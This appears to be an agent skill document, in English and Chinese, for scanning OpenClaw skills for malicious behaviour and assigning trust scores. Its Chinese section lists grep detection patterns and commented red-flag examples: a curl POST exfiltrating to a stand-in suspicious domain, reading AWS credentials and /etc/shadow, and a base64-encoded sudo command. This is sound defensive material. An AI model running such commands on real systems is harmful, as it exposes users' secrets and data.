Skill Security Scanner

Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust.

When to Use

- Before installing a new skill from ClawHub
Auditing existing installed skills
User asks "is this skill safe?"
After ClawHavoc type incidents (malicious skills in ecosystem)
Before running untrusted skills

Quick Reference

Command	Purpose
INLINECODE0	Scan a single skill
INLINECODE1

Scanning Strategy

1. Check Metadata (Frontmatter)

Look for:

- bins - CLI tools skill needs
INLINECODE5 - Environment variables (API keys, tokens)
INLINECODE6 - Required config settings
INLINECODE7 - Binary dependencies

Red flags:

- Skills requesting many bins without clear purpose
Env vars for sensitive services (AWS keys, database passwords)
Config requiring admin/elevated permissions

2. Analyze SKILL.md Content

Suspicious patterns to detect:

CODEBLOCK0

3. Trust Score Calculation

Score from 0-100 based on:

Factor	Weight	Criteria
Author reputation	20%	Known author? Official OpenClaw skill?
Permission scope

4. Risk Levels

Score	Risk	Action
80-100	🟢 Low	Safe to use
60-79

Output Format

Scan Result

CODEBLOCK1

Trust Report

Generate a full report:

CODEBLOCK2

Common Red Flags

High Risk Patterns

1. Network exfiltration

CODEBLOCK3

2. Credential harvesting

CODEBLOCK4

3. Persistence mechanisms

CODEBLOCK5

4. Obfuscated code

CODEBLOCK6

Medium Risk Patterns

1. Excessive permissions - More bins/envs than needed
No documentation - Unclear what skill does
Outdated - No updates in 6+ months
Third-party dependencies - Unknown npm/go packages

Green Flags

1. ✅ Official OpenClaw skills (openclaw/skills)
✅ Clear, specific permissions
✅ Active maintenance (recent commits)
✅ Open source with clear code
✅ Known author with reputation

Workflows

Before Installing New Skill

CODEBLOCK7

Regular Security Audit

CODEBLOCK8

Quick Trust Check

CODEBLOCK9

Integration with Other Skills

- Works with self-improving-agent - Log security findings
Use memory - Remember trust scores for known skills
Report findings to user before risky operations

Best Practices

1. Always scan before installing untrusted skills
Document scan results in INLINECODE8
Share findings with community (anonymized)
Update trust scores when vulnerabilities found
Trust but verify - Don't rely solely on automated scanning

Examples

Example 1: Scanning Before Install

User wants to install "cool-new-skill" from ClawHub:

CODEBLOCK10

Example 2: Finding Malware

CODEBLOCK11

Example 3: Audit Report

CODEBLOCK12

- ClawHavoc incident (Feb 2026) - 341 malicious skills
Agent Trust Hub - Third-party security tooling
OpenClaw Security docs: docs.openclaw.ai/gateway/security

技能安全扫描器

扫描OpenClaw技能中的安全问题、可疑模式，并给出信任评分。帮助用户对哪些技能值得信任做出明智决策。

使用时机

- 安装前从ClawHub安装新技能时
审计已安装的现有技能时
用户询问这个技能安全吗？
ClawHavoc类事件后（生态系统中出现恶意技能）
运行前运行不受信任的技能时

快速参考

命令	用途
scan-skill <路径>	扫描单个技能
scan-all

扫描策略

1. 检查元数据（前置信息）

查找：

- bins - 技能所需的CLI工具
env - 环境变量（API密钥、令牌）
requires.config - 所需的配置设置
requires.bins - 二进制依赖项

危险信号：

- 技能请求大量二进制工具但用途不明确
敏感服务的环境变量（AWS密钥、数据库密码）
需要管理员/提升权限的配置

2. 分析SKILL.md内容

需检测的可疑模式：

bash

对未知域名的网络调用

grep -E (curl|wget|http|https).*\.com SKILL.md
grep -E fetch\(|axios\( SKILL.md

超出声明范围的文件系统访问

grep -E rm -rf|dd |mkfs SKILL.md

凭据访问

grep -E password|secret|token|key SKILL.md

执行下载的代码

grep -E eval\(|exec\(|system\( SKILL.md

Base64编码的命令

grep -E base64|-enc|-encode SKILL.md

3. 信任评分计算

评分范围0-100，基于以下因素：

因素	权重	标准
作者声誉	20%	知名作者？官方OpenClaw技能？
权限范围

30% | 最少的二进制工具/环境变量？ |
| 代码模式 | 25% | 无可疑命令 |
| 更新频率 | 15% | 近期更新过？ |
| 下载量 | 10% | 流行度越高=审查越严格 |

4. 风险等级

评分	风险	操作
80-100	🟢 低	可安全使用
60-79

🟡 中 | 使用前审查 | | 40-59 | 🟠 高 | 谨慎使用 | | 0-39 | 🔴 严重 | 不要使用 |

输出格式

扫描结果

🔍 技能：<技能名称>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 信任评分：<评分>/100（<风险等级>）

📋 请求的权限：
• 二进制工具：curl, jq
• 环境变量：OPENWEATHERAPIKEY

⚠️ 发现的问题：
1. [中] 请求网络访问但用途不明确
2. [低] 无近期更新（6个月以上）

✅ 积极信号：
• 官方OpenClaw技能
• 文档清晰

信任报告

生成完整报告：

markdown

安全分析：<技能名称>

评分：<评分>/100（<风险等级>）

权限分析
类型请求项风险
二进制工具 curl, jq 低
环境变量
API_KEY | 中 |

类型	请求项	风险
二进制工具	curl, jq	低
环境变量

代码模式分析

- ✅ 无可疑执行模式
✅ 无凭据访问尝试
⚠️ 2次对外部域名的网络调用

建议

<建议>

常见危险信号

高风险模式

1. 网络数据外泄

bash # 示例：向未知服务器发送数据 # curl -X POST https://可疑域名/外泄 # fetch(https://数据收集器.域名)

2. 凭据窃取

bash # 示例：读取凭据 # cat ~/.aws/credentials # grep password /etc/shadow

3. 持久化机制

bash # 示例：自动启动、定时任务、系统服务 # sudo crontab -l # systemctl enable

4. 混淆代码

bash # 示例：base64编码的命令 echo c3VkbyByb20gL3J0ZiAv | base64 -d

中风险模式

1. 权限过多 - 超出需要的二进制工具/环境变量
无文档 - 技能功能不明确
过时 - 6个月以上无更新
第三方依赖 - 未知的npm/go包

安全信号

1. ✅ 官方OpenClaw技能（openclaw/skills）
✅ 清晰、具体的权限
✅ 积极维护（近期提交记录）
✅ 开源且代码清晰
✅ 知名作者且有声誉

工作流程

安装新技能前

bash

1. 获取技能路径（ClawHub或本地）

2. 运行完整扫描

scan-skill /path/to/skill

3. 检查信任评分

trust-score /path/to/skill

4. 审查问题

5. 决定：安装 / 跳过 / 进一步调查

定期安全审计

bash

每周：扫描所有已安装技能

scan-all

每月：生成完整报告

保存到.learnings/目录作为文档

快速信任检查

bash

用于快速决策

trust-score <路径>

如果评分 < 60，进行完整扫描

如果评分 < 40，不要使用

与其他技能的集成

- 与自我改进代理配合使用 - 记录安全发现
使用记忆 - 记住已知技能的信任评分
在进行风险操作前向用户报告发现

最佳实践

1. 始终扫描安装不受信任的技能前
记录扫描结果到.learnings/目录
分享与社区分享发现（匿名化）
更新发现漏洞时更新信任评分
信任但验证 - 不要仅依赖自动扫描

示例

示例1：安装前扫描

用户想从ClawHub安装cool-new-skill：

scan-skill ./skills/cool-new-skill

🔍 扫描：cool-new-skill
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 信任评分：72/100（🟡 中）

📋 权限：
• 二进制工具：无
• 环境变量：无

⚠️ 问题：
• 无近期更新（8个月）
• 作者未知

✅ 积极因素：
• 文档清晰
• 权限最小化

💡 建议：可安全尝试，监控使用情况

示例2：发现恶意软件

scan-skill ./skills/suspicious-skill

🔍 扫描：suspicious-skill
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 信任评分：23/100（🔴 严重）

📋 权限：
• 二进制工具：curl, base64
• 环境变量：APIKEY, SECRETTOKEN

🚨 发现严重问题：
1. 检测到网络数据外泄模式
2. 尝试访问凭据
3. 混淆命令（base64）

💀 建议：不要使用 - 潜在恶意软件

示例3：审计报告

scan-all

📋 扫描 ~/.openclaw/workspace/skills/ 中所有技能
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

✅ github：95/100（安全）
⚠️ todoist：68/100（需要审查）
✅ self-improving-agent：92/100（安全）
🔴 unknown-skill：34/100（建议移除）

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
摘要：2个安全，1个需审查，1个需移除

skill-security-scanner安全扫描器